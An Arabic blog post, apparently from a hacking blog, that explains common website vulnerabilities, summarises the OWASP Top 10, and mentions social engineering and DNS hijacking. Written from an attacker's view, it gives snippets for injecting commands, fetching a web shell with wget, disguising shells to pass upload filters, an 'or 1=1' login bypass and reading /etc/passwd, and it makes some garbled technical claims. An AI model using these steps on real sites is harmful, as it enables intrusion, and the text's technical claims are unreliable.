16922060824144624
أخبار ساخنة

كيف يتم اختراق المواقع و ما هي الثغرة

الخط


السلام عليكم و رحمة الله و بركاته 
ربما سمعت يوما ب اختراق موقع ما و لكنك لا تعلم يكف تمت عمليت الاختراق 
قبل ان اقوم ب تنزيل هادا الشرح ترددت قليلا  لانه سوف يعتبر من التقليل من قيمة المتابعين لانه اي شخص يعرف ما هي الثغرة و لكن و في احد المرات و في العالم الحقيقي سالني احد الاصدقاء 
انت تخترق المواقع كيف هل تنتضرهم في الليل حتى ينامو و تخترق انت الموقع !! 
من الواضح ان صديقي شخص غبي كثيرا لانه سال مثل هادا السؤال لهادا اليوم و في هده التدوينة المتواضعة سوف نناقش مع بعض كيف يتم اختراق المواقع

الثغرة 
في البداية يجب ان تعرف ما هي الثغرة قبل ان تعرف كيف يخترق الموقع من خلالها 
هل الثغرة موجودة مسبقا و المبرمج اخطء في الكود 
احيانا على سبيل المثال هناك ثغرة ب اسم xss تاتي ب سبب عدم عمل فلترة ل البينات المدخلة من قبل المستخدم ف جميع المبرمجين الان يتفادون هده الثغرة لانهم يعرفونها مثلها مثل باقي الثغرات 

اما هناك ثغرات لا وجود لها مسبقا
اي ان الثغرة لم تكتشف بعد  و احيانا تسمى 0day  او الهجوم دون انتضار  او  Zero-day attack 
دعونا تعرف مع بعض على هادا النوع من الثغرات 
Zero-day attack هو استغلال نقاط الضعف في البرمجيات وثغراتها الأمنية خاصة غير المعروفة منها للعامة أو حتى مطوريها في شن هجومات إلكترونية. غالبا ما يتم استغلال هذه الثغرات وحتى تشاركها ما بين القراصنة "Hackers" قبل أن تكتشفها الجهات المطورة للبرمجيات المصابة. المعرفة بالثغرة الأمنية قبل المطورين، تسمح لمستغليها بالحصول على فترة زمنية ينشر فيها أدواته الخبيثة لتحدث ضررا كبيرا. لأنه متى ما اكتشفت الثغرة الأمنية، يسارع المطورون لسدها من خلال نشر برامج تصحيحية.

المصطلح Zero-day attack أتى من كون أن مستغل الثغرة الأمنية غير المعروفة لا يترك أي يوم يمر لبدء هجومه كونه في سباق مع الزمن. وطالما تأخر اكتشاف الثغرة، منح ذلك مزيد من الوقت للمهاجمين في توسيع نطاق الهجوم وإضافة ضحايا جدد 

و ادا لم تفهم سوف افهمك غصباعنك 
مثلا 
مثلا هناك سكربت يقوم ب عملية التصال ب قواعد البينات و تسجيل الدخول ب اسم مستخدم و كلمة سر !!! 
حسنا سوف نحاول نحن ك attack  ان نقوم ب البحث على اي طريقة ل استغلال تلك العملية ل مصالحنا (الاختراق) و بكل تاكيد في هادا السكربت العديد من المتغيرات والعديد الدوال و ب خبرتنا في البرمجة سوف نحاول ايجاد ثغرة ما في طبيعة العمل اي المنطق البرمجي على سبيل المثال عندكتابتك لاسم المستخدم و كلمة السر بكل تاكيد هناك اشياء تحدث وراء الكواليس فس السيرفر 
و سوف نحاول نحن كمهاجمين ان نستغلهال ما نريد

انواع الثغرات الاكثر انتشارا و التي يستغلها الهاكرز ب شدة


المهم اول شي يجب ان تعرفه الريموت واللوكال
اللوكال.locall. تكون اللوكال وانت محلي على السيرفر وتسمى باللوكال .هذا النوع يقصد به محلي يعني انك لازم تكون على الشل مثلا يعني متواجد على السيرفر .:.
الريموت.remot. وهي تسمى بالسيطرة عن بعد وهذا النوع اخطر من اللوكال .ويقصد به التحكم عن بعد وانت على جهازك تشغل الثغرة على الموقع ايا كان نوع او طريقة عمل الثغرة راح تشتغل معك .:.
-------------------------------------------------------------
ثغرات الفايل انكلود :Remote File Inclusion Vulnerabilityy
من اشهر الثغرات قوة . لكنها اصبحت قديمة وصعب انك تلاقيها  بس لا تفقد الامل يمكن تلاقيها في بعض المواقع
 هذا النوع من الثغرات .يقصد بها ان مصمم السكربت قد وقع في خطا برمجي وهذا الخطا يسمح لنا (((( بربط ملف خارجي بالموقع )))
ما هو الملف الخارجي؟؟ (((( الشل او اي اداه اختراق ))))).
اما عن كيفية اكتشافها فهي صعبة  لكن من لديه خبرة في لغة php او اللغات البرمجة الاخرى
 فيمكنه اكتشافها بتنزيل السكربت عندة والبحث عنها في السكربت يدويا او عن طريق بعض البرامج التي اثبتث جدارتها في البحث عن ثغرات الفايل انكلود.:.:.:.
 هذه الثغرة مشرروحة بكثرة في منتدانا .:. لانها سهله هعهعهعهع  فلن اشرح عنها اكثر
-------------------------------------------------------------
ثغرات قواعد البيانات: SQL Injectionn 
ايضا اصبحت هذه الثغرة من الثغرات القوية وهي حسب النتائج اصبحت ثغرة هذا الوقت
 وتمكننا هذه الثغرة من معرفة معلومات مهمة ومختلفة  حسب العمل الذي تقوم به  اقرب مثال لهذه الثغرة  معرفة اسم الدخول وكلمة المرور لمدير الموقع
 هذا النوع من الثغرات تعتمد على اخطاء السكربتات التي تتعامل مع قواعد البيانات 
 قواعد البيانات قاعدة البيانات تحتوي عى معلومات مهمة جدا مثلا تحتوي على على اسماء والباسورد لمستعملي الموقع واهم شي هو باسورد الادمن اي باسورد صاحب الموقع
 وعند استطاعتنا الحصول على الباسورد هنا نقف عند نوع التشفير فاذا كان الباسورد مشفر تشفير (md5) وهو اصعب تشفير في مجال المواقع ولا اعتقد ان هناك برامج تفك هذا التشفير
و  هناك سكربتات لتشفير الرقم السري الى (md5) بمجرد ما تضع الرقم السري راح يحولة الى 32
لكن هناك بعض البرامج التي تفك لك التشفير 90%1000 لكن بوجود السالت تبع الادمن وهي الكلمة السرية لتذكر الباسورد عند نسيانة عن طريق التخمين
 يعمل التخمين بتقنية المقارنة  اي تعطيه الباسورد المشفر ويبدا المقارنة فاذا كانت المقارنة هي التساوي اذا قد تم فك التشفير
 ولاستكشاف هذه الثغرة يجب ان تنفذ الاستكشاف عن رابط يكون له اتصال بقواعد البيانات

-------------------------------------------------------------
ثغرات XXS : Cross-Site Scriptingg  
هذه الثغرة نستطيع من خلالها تنفيذ الكثير  لكن يجب ان تعرف هذه اللغات
(html) او (جافا سكربت .**********) يعني بامكانك تنفيذها باي مكان فيه ادراج كتابة .مثلا ادراج الكود في الاهداء
عن طريق هذا الكود (مو شرط ايكون هذا)>>>
كود:
(’zer0o0-hacker’)
فاذا ضهر مربع تحذير فان الثغرة شغالة ..
.:.: بعض الاستغلات لهذه الثغرة...
سحب كوكيز اعضاء الموقع
تلغيم الموقع
 اضافة اي كود جافا سكربت 
 ولغة الجافة بلوى او بالاصح مشكلة  يعني اذا لقيت هذه الثغرة في موقع بهذه اللغة ستسقط الموقع. وغيرها من الاستغلالات
بلغة (html) او (جافا سكربت .**********) .:.:
و هذه الثغرات تنقسم الى ( الدوم والبريسنت والنان بريسنت)...ok
-------------------------------------------------------------
ثغرات الرفع :  File Uploedd 
 هذه الثغرات تمكننا من رفع ملف على الموقع
ثغرات مراكز التحميل
 وهذه الثغرات بالنسبة للمبتدئين من اسهل الثغرات يعني بسهولة ثغرة فايل انكلود  لكن الاختلاف ان هذه الثغرات بعدها شغالة على بعض مراكز التحميل
يعني تعتمد على نوع السكربت الذي يستخدمه مركز التحميل
 بمجرد انك ترفع الشل و تاخذ الرابط وتضعه في المتصفح راح يشتغل .:. وفي بعض المرات تحتاج الى خداع المركز من ناحية الامتداد
بحيث يكون امتداد الشل .:. هكذا r57,php,rar او c99.php.jpgg او غير امتداد
 او مثلا اذا كان هناك مركز تحميل الاغاني بمجرد انك ما ترفع ملف مثل ملف htaccess. وتضع به اكواد مختلفة لاستقبال الملفات مثل كود يشغل ملفات الام بي اثري كملفات php
وبعد رفعه اتروح ترفع ملف الشل الي هو php بعد تحويل صيغته ال  mp3 وترفعه على المركز هعععععععععععع وراخ يشتغل معاك
بعض منها شغالة على مراكز التحميل

ثغرات : Command Executionn 

هذه الثغرات تشبه ثغرات الفايل انكلود ولكن الاختلاف انك ما راح تضيف اداه الاختراق باحد
المتغيرات المصابة  بل تمكننا هذه الثغرة من كتابة اوامر ((linux)) اي اوامر نضام لينكس اي اوامر الشل ... يعني
 تسمح لنا باعطاء اوامر للسيرفر بالاصح التحكم بالسيرفر حسب الصلاحية مثلا امر اضهار ملفات الموقع dir او ls او اضهار صلاحيتك عبر الامر id  الخ
 يعني مثلا نحن في هذا المسار 
بدال كوومناد نضع الامر لينكس اذا كان السيرفر لينكس يعني اذا اردنا ان نعرف مكاننا على السيرفر بالامر pwd
كود PHP:
127.0.0.1/index.php?id=pwd
ثم انشوف الملفات وتصاريحها بالامر ls -la
ومن تلاقي مجلد له تصريح 777 مثلا المجلد data في تصريح 7777
تدخل للمجلد بالامر cd وتسحب الشل بالامر wget مثلا هكذا
كود PHP:
 cd home/domains/zer0o0-hack.com/public_html/vb/data;wget http://link[shell.zip
هنا نفذنا امرين امر الدخول للمجلد وامر السحب ووضعنا الامرين معا بالعلامة [;]
حسنا بعد التاكد من سحب الشل انفك ضغط الشل باالامر unzip shell.zip
 الان راح يعمل معاك الشل بمجرد تاخذ مسار الشل الذي وضعته في المجلد وتضعه بعد رابط الموقع  وهكذا
وهناك شروحات اخرى عنها
-------------------------------------------------------------
ثغرات : File Disclosuree 
 وهي الثغرات التي نستطيع من خلالها قرائة ملفات الموقع الهدف وهي كذلك تشابة كثيرا
الثغرة الي فوق
 وهذه الثغرة تمكننا في بعض االاحيان السيطرة على السيرفر كاملا  اي بالاصح قرائة الملفات المهمة مثل ملفات
(etc/ (passwd,valiasess وبالامكان ايضا قرائة ملفات اي موقع بالسيرفر حسب مكانه في السيررفر
-------------------------------------------------------------
ثغرات البوفر اوفر فلو : buffer overfloww
 هذه الثغرات تحصل بسبب خلل برمجي باالاصح (غفلة من مصمم السكربت)في السكربت او البرنامج
 مثلا دخلنا على احد السكربتات وطلب منا ان ندخل الاسم ومبرمج السكربت طلب من البرنامج ان عدد الاحرف لاسم المستخدم لن يتجاوز 20
 يعني معقولة في اسم يتجاوز عشرين حرف او مثلا اسم عضو يتجاوز ثلاثين حرف  مو معقولة
حسنا متى تحصل الثغرة  عندما ندخل مثلا 100 او 1500 حرف كاسم للمستخدم  البيانات اذي ادخلناها ستكون زائدة جدا فسيحصل طفحان وهو يسمى
""overflow"" في ذاكرة التي خصصت لمتغير الاسم
هذه الثغرات ترشدنا الى معلومات اخرى  منها= المعالجة (proccesss) فالمعالجة هي المسئولة عن العمليات التي تحصل في الحاسبة
 ولكل عملية تحصل في الحاسبة لها عنوان فاضي في الذاكرة .:. ولا يمكن لاي عملية او برنامج اي يدخل الى هذه الذاكرة المخصصة لتلك العملية .:.
ايضا يجب عينا ان نذهب لنقرا القليل عن ادارة الذاكرة ((memory management) عندما يكون لدينا عدد كبير من العمليات موجهة الى الذاكرة الحقيقة .:.
 وفي نفس الوقت الذاكرة الحقيقة اصغر من كمية المهام الموجهة للذاكرة الحقيقة  ستحصل مشكلة ؟؟ اليس كذلك
 استغلال هذه الثغرات يكون . عندما ندخل بيانات اكبر حجما من الذاكرة التي خصصت لهذه البيانات  فان البيانات الزائدة ستفيض في الذاكرة بعد المتغير ؟؟ من هذا المكان في الذاكرة
 سوف نستفاد من هذه الثغرات  وهذه الدروس موجودة او ابحث عنها في كوكل
ربي يسهلها لكم جميعا ولكل من ناوي يتعلم لافادة الاسلام والمسلمين
ايضا بالامكان عن طريق هذه الثغرات ان ناخذ روت بدون ما نرفع شل اصلا
-------------------------------------------------------------
ثغرات :Remote Dump Database او
Data**** Backup Dump Vulnerability
 هذه الثغرات تعمل على حسب انواع السكربت واصداراتها .:. مثل ما قلنا لكل اصدار او سكربت ثغرة وطرق عدة لاستغلالها
 هذا النوع من الثغرات وهو خاص بسحب باك اب لسكربت معين او نسخ قواعد بيانات كاملة
 من خلال ملف سواء ان يكون مجلد الادمن او اي مجلد وضيفته سحب المعلومات من جداول قاعدة البيانات
ومن خلالها سحب الملعومات المهمة الموجودة في users ..الخ..
 فكرة الثغرة انها تقوم باخذ باك اب للسكربت الموجود ومن خلالها سوف نقراء المعلومات المهمة
 مثلا اذا سحبنا ملف قاعدة البيانات للمنتدى ايش استفدنا  اليوزر والباس المشفر هع للادمن  ومواقع الفك كثيرة جدا
اغلب الملفات تبع الباك اب يختلف مسارها لكن الاغلب في مجلد admin
واسماء الملفات ايضا الاغلب تكون هكذا ::backup.php or upgrade.phpp  هي بالاصل تعتمد على مبرمج السكربت وتسميته ملفاته .:.
---------------------------------------------------------------------------------------------
ثغرات :bypass admin control panal اوBypass :
هذه الثغرات تسمح لنا بتجاوز لوحة التحكم control panall تبع الادمن . اي تخطي صفحة طلب الباسبورد والاسم المرخص لهم بدخول لوحة تحكم
طريقة {{{{{ or 1=11}}}}}}}}}}} حسب الرموز التي تدخلها والرموز كثيرة جدا  او عن طريقة الدخول على اي ملف من ملفات المجلد من خلال السكربت
 ويمكن نتخطاها بهذه الطريقة  هذه الثغرة لها الكثير من الطرق وشرحها سيطول  لكن من باب الاستفادة ذكرتها لكم
-------------------------------------------------------------
ثغرات : Remote Admin Password Changee  اي تغيير كلمة السر من التحكم البعيد
هذا النوع مشهور واقرب مثال له هي ثغرة سكربت جوملة token joomall هذه الثغرة تسمح لنا بتغيير باسورد
 مدير الموقع  بدون الحاجة لمعرفة الباسورد القديم . ايضا هناك طريقه جديدة عن هذه الثغرات من اكتشاف احد العباقرة الفلنديين
 عجبتني الطريقة عبر مشاهدتها عبر احد الشروحات له وهي بوضع اكواد مختلفة من كافة لغات البرمجة ثم يبدا بتشفيرها .تشفير جديد لم اعرفه ايضا ذكرتها من باب الاستفادة
-------------------------------------------------------------
 المهم اخوان هذه الثغرات المعروفة هي جزء من كثير من الثغرات .:. ولكل ثغرة طرق اخرى في الاختراق
وهذه بعض الطرق التي تتم مناقشتها من قبل الهكرز المحترفين
1-Data center Attack  وهو سحب بيانات الداتا سنتر التي تدعم الموقع
2-DNS Attack هذه الطريقة تعتمد على تحويل DNS الداعم للسيرفر
3-penetration of Domainn باين من اسمة (وهو اختراق الدومين للموقع المستهدف (بعدة طرق))
4-Remote Roott  هذه الطريقة تعتمد على الحصول على الروت من غير شل وهي عن طريق بعض الطرق ومن هذه الطرق
شرحت عنه وهي (buffer over flow) وغيرها الخ
5-ddos attack وهي عملية حجب الخدمة ايضا تكون بعدة طرق
6-Server Mail supporterr هذه طرق حديثة تعتمد على وضع اكواد لتغيير الايميل الداعم للسيرفر
7-Cpanel Commandss  هذه الطريقة تعتمد على تنفيذ بعض الاوامر من خلال عمل ادوات تطابق (cpanel) وتنفيذ الاوامر منهاواكيد راح تتمكن من رفع الاندكس تبعك
او التعديل في الموقع
8- xss قليل من يعرفون عنها وذو طريقة فعالة
 وهناك الكثير ايضا من الطرق لكن الشي الاخير هو يجب ان تعتمد على ما اعطاك ربك وهو عقلك 

تصنيف اخطر الثغرات و الاكثر انتشارا حسب ما نشرته owasp

1  ثغرات الحقن  Injection 

تحدث عيوب الحقن مثل  SQL, OS, XXE,  LDAP injection  عند إرسال بيانات غير موثوق بها إلى المترجم كجزء من أمر أو استعلام  البيانات العدائية للمهاجم يمكن خداع المترجم إلى تنفيذ الأوامر غير مقصودة أو الوصول إلى البيانات دون إذن صحيح و اختراق الوقع 

2 Broken Authentication and Session Management

وغالبا ما تنفذ functions التطبيقات المتعلقة التوثيق وإدارة الجلسة بشكل غير صحيح، مما يسمح للمهاجمين بخرق كلمات السر، والمفاتيح، أو الرموز الدورة، أو لاستغلال عيوب التنفيذ الأخرى لتحمل هويات المستخدمين الآخرين (مؤقتا أو بشكل دائم)


Cross-Site Scripting XSS 3
تحدث عيوب XSS كلما كان التطبيق يتضمن بيانات غير موثوق بها في صفحة ويب جديدة دون التحقق تحديث صفحة ويب موجودة مع البيانات الموردة للمستخدم باستخدام API المتصفح التي يمكن أن تخلق جافا سكريبت. XSS يسمح المهاجمين لتنفيذ البرامج النصية في متصفح الضحية التي يمكن خطف جلسات المستخدم، تشويه المواقع على شبكة الإنترنت، أو إعادة توجيه المستخدم إلى المواقع الخبيثة

Broken Access Control 4 
لا يتم فرض قيود على ما يسمح للمستخدمين المخولين القيام به بشكل صحيح. يمكن للمهاجمين استغلال هذه العيوب للوصول إلى وظائف و / أو بيانات غير مصرح بها، مثل الوصول إلى حسابات المستخدمين الآخرين، وعرض الملفات الحساسة، وتعديل بيانات المستخدمين الآخرين، وتغيير حقوق الدخول، وما إلى ذلك


Security Misconfiguration 5 
يتطلب الأمن الجيد وجود configuration آمن تم تعريفه ونشره للتطبيق والأطر وخادم التطبيق وخادم الويب وخادم قاعدة البيانات والمنصة وما إلى ذلك. يجب تحديد الإعدادات الآمنة وتنفيذها وصيانتها نظرا لأن الإعدادات الافتراضية غالبا ما تكون غير آمنة. بالإضافة إلى ذلك، يجب أن تبقى البرامج حتى الآن


Sensitive Data Exposure 6

العديد من تطبيقات الويب وواجهات برمجة التطبيقات لا تحمي البيانات الحساسة بشكل صحيح، مثل financial, healthcare, and PII. يمكن للمهاجمين سرقة أو تعديل هذه البيانات ضعيفة الحماية لإجراء الاحتيال بطاقة الائتمان، وسرقة الهوية، أو غيرها من الجرائم. البيانات الحساسة تستحق حماية إضافية مثل التشفير في الراحة أو في العبور، فضلا عن الاحتياطات الخاصة عند تبادلها مع المتصفح


حماية هجوم غير كافية

غالبية التطبيقات وواجهات برمجة التطبيقات تفتقر إلى القدرة الأساسية للكشف عن، ومنع، والرد على كل من الهجمات اليدوية والآلية. الحماية الهجوم تتجاوز أبعد من التحقق من صحة المدخلات ويتضمن involves automatically detecting  logging, responding ، وحتى حجب استغلال محاولات. أصحاب التطبيقات أيضا بحاجة إلى أن تكون قادرة على نشر بقع بسرعة للحماية ضد الهجمات


8 Cross-Site Request Forgery (CSRF)

يجبر هجوم CSRF أحد مستعرضي الضحية على تسجيل إرسال طلب HTTP مزورة، بما في ذلك ملف تعريف ارتباط الكوكيز  جلسة الضحية وأي معلومات مصادقة أخرى مضمنة تلقائيا، إلى تطبيق ويب ضعيف. مثل هذا الهجوم يسمح للمهاجم لإجبار متصفح الضحية لتوليد طلبات التطبيق الضعيف يعتقد أن طلبات المشروعة من الضحية

9 Using Components with Known Vulnerabilities
يتم تشغيل المكونات، مثل libraries و frameworks, and other software modules ، بنفس الامتيازات مثل التطبيق. إذا تم استغلال عنصر هش، يمكن أن مثل هذا الهجوم تسهيل فقدان البيانات الخطيرة أو استيلاء على  الخادم. وقد تقوض التطبيقات وواجهات برمجة التطبيقات باستخدام المكونات ذات الثغرات الأمنية المعروفة دفاعات التطبيقات وتمكن مختلف الهجمات والآثار

10 Underprotected APIs

غالبا ما تتضمن التطبيقات الحديثة تطبيقات عملاء غنية وواجهات برمجة تطبيقات، مثل جافا سكريبت في المتصفح وتطبيقات الجوال، والتي تتصل بواجهة برمجة تطبيقات من نوع ما (SOAP/XML, REST/JSON, RPC, GWT, etc.). غالبا ما تكون واجهات برمجة التطبيقات هذه غير محمية وتحتوي على العديد من نقاط الضعف.

و بعد ما تعرفنا على كيف يتم اختراق المواقع عبر الثغرات و انواعها 
يجب ان نتعرف على بعض الطرق الاخرى و التي هي نادرة الاستخدام 

الهندسة الاجتماعية 
ربما سوف تتعجب قليلا و تنضر في نفسك 
و تقول هندسة اجتماعية لاختراق المواقع !!! طبعا هي امر عجيب و هدا النوع من الطرق نادر الاستخدام ابرز ما تم اختراقه ب الهندسة الاجتماعية كان الموقع الرسمي الدي يعطي شهادة الهكر الاخلاقي CEH  حينها جمع المهاجم الكثير من المعلومات حول المدير و قد علم ان له ولد مصاب ب مرض السلطان (عافانا الله و اياكم) و  ارسل له عبر الايميل انه من  جمعية التكفل ب مرضى السلطان ووو و بدا التقرب منه و ارسل له ملفPDF ملغم و من ان فتحه المدير حتى تم اختراق الشركة ب الكامل و قد تم اختراق موقعهم الرسمي ايضا 
و لكن هده الطرق تحتاج الكثير من الصبر 

وهناك نوع اخر من اختراق المواقع 
اختراق المواقع عبر  DNS hijacking او اختطاف نظام أسماء النطاقات
إختطاف نظام أسماء النطاقات (DNS hijacking) هي عملية لإفساد عمل نظام اسم المجال أو للتحكم به. ويمكن تحقيق عملية الإختطاف هذه عبر برامج ضارة malware يمكنها من تجاوز إعدادات حزمة بروتوكولات الإنترنت الخاصة بالكمبيوتر وتحويل مسار اسم المجال الطبيعي إلى اسم المجال المختطف عبر المختطفين، أو من خلال تعديل بيانات نظام أسماء النطاقات إلى بيانات لا تتوافق مع معايير الإنترنت.
ويمكن إجراء عملية الإختطاف هذه لأغراض غير جيدة كمثال على ذلك عمليه تسمى التصيد phishing أو لأغراض تخدم المصالح الذاتية من قبل مقدمي خدمات الإنترنت في الدول (مزود خدمة الإنترنت) للتحكم بحركة الإنترنت ومراقبتها، أو حتى لإغلاق المواقع الغير مرغوبة.
خلفيه تقنيه

احد اهم وظائف عمل خوادم ال DNS انه يقوم بتحويل اسم النطاق الى عنوان اي بي IP address وهو ما تحتاجه التطبيقات او البرامج لتستطيع الاتصال بموارد بالانترنت Internet Resources مثل موقع الويب . هذه الوظائف تعرف بالعديد من اشكال معايير الانترنت Internet Standards والتي تعرف البرتكول الخاص بتفاصيل هامه 
و هناك مواقع عالمية قد تم اختراقها ب هادا النوع من الثغرات 
لعلى ابرزها موقع تويتر 
في النهاية ل تتقن اكتشاف الثغرات و استغلالها يجب ان تتعلم البرمجة و اما في الويب ف يجب ان تتعلم php او asp لكتشاف الثغرات و الحتراف في هادا المجال 
في النهاية لاي استفسار اترك تعليقك في المدونة  





إرسال تعليق

نموذج الاتصال
الاسمبريد إلكترونيرسالة

يا رب تروح للجنة إشترك في قناتي